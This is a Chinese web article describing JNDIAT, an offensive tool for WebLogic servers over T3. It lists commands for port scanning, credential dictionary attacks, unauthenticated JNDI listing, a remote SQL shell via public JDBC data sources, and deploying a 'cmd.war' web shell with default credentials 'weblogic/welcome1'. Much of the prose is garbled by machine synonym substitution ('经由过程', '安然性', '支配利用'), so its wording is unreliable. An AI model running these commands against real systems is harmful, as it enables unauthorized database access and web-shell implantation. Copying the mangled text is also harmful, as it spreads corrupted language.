Jndiat:通过T3协议测试Weblogic服务器安全性

JNDIAT(JNDI进击对象)是一款开源的经由过程T3协议测试Weblogic server安然性的对象。

JNDIAT应用示例:

搜索是否有可经由过程T3协议造访的Weblogic端口;

远程搜索有效帐户以获取特权连接;

列出可造访的JNDI(Java命名和目录接口),以懂得你在远程Weblogic server上可以做履行的操作(无需/应用WebLogic帐户);

应用不受保护的(即“public”)JDBC数据源,来获取远程交互式SQL shell;

在Weblogic server上支配利用(例如War)以获取Web shell(必要帐户)。

*已在Oracle Weblogic 11长进行测试。

特点

同时支持T3和T3(T3 over SSL)连接。JNDIAT会创建一个本地临时Java KeyStore来验证Weblogic server的证书;

支持应用空凭据进行身份验证,即login=” and password=”。 默认环境下,在Weblogic中公共JDBC数据源可以与空帐户一路应用(已在version11上测试);

假如weblogic在域中,则支持targets;

检测可经由过程T3协议造访的端口;

经由过程字典进击查找有效凭证;

获取可经由过程特定帐户(或无帐户)造访的JNDI列表;

经由过程JDBC数据源获取远程sql shell;

应用特权帐户,你可以在weblogic办事器上支配利用法度榜样获取Web shell。

应用示例

下载安装最新版本的jndiat:https://github.com/quentinhardy/jndiat/releases

查看赞助

java -jar Jndiat.jar -h

JNDIAT 版本

java -jar Jndiat.jar –version

端口扫描

该模块用于扫描可经由过程T3(或T3)协议造访的端口,获取JNDI列表。

应用7001端口建立一个T3连接:

java -jar Jndiat.jar scan -s 192.168.56.101 –ports 7001

扫描7001和7002端口:

java -jar Jndiat.jar scan -s 192.168.56.101 –ports ‘7001,7002’

扫描7001到7010之间的端口:

java -jar Jndiat.jar scan -s 192.168.56.101 –ports ‘7001-7010’

JNDIs列表

该模块用于获取经由过程T3协议可造访的JNDI列表。此模块异常有用,可以让你知道某些JNDI是否可以在不进行身份验证的环境下造访(例如:“public”JDBC数据源)。

获取192.168.56.101办事器7001端口可造访的JNDIs:

java -jar Jndiat.jar list -s 192.168.56.101 -p 7001

假如未在敕令中指定凭证,则JNDIAT将为我们返回无需身份验证即可造访的JNDI。假如你知道有效凭证,则可以应用它来获取更多的JNDI:

java -jar Jndiat.jar list -s 192.168.56.101 -p 7001 -U username -P password

JDBC数据源

此模块容许你经由过程JDBC数据源获取远程SQL shell。

从JNDI数据源获取交互式SQL shell:

java -jar Jndiat.jar datasource -s 192.168.56.101 -p 7001 –sql-shell

JNDIAT将会扣问你所应用的JDBC数据源。假如你知道数据源名称,则可以进行指定:

java -jar Jndiat.jar datasource -s 192.168.56.101 -p 7001 –sql-shell –datasource=’jdbc/myDataSource’

支配利用

该模块容许你经由过程T3协议在远程Weblogic server中支配利用法度榜样(例如.war,.ear)。要应用此模块,你可能必要有高权限(一个帐户那是必须的)。

以下敕令将在远程Weblogic server上支配“cmd.war”利用:

java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 –deploy –appl-file cmd.war

从远程weblogic server取消支配先前的war(’cmd.war’)利用:

java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 –undeploy

应用–display-name选项变动weblogic server上支配的利用法度榜样名称:

java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 –deploy –appl-file ‘cmd.war’ –display-name ‘appli-name-displayed’

取消支配名为appli-name-display的特定利用法度榜样:

java -jar Jndiat.jar deployer -s 192.168.56.101 -p 7002 -U weblogic -P welcome1 –undeploy –display-name ‘appli-name-displayed’

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包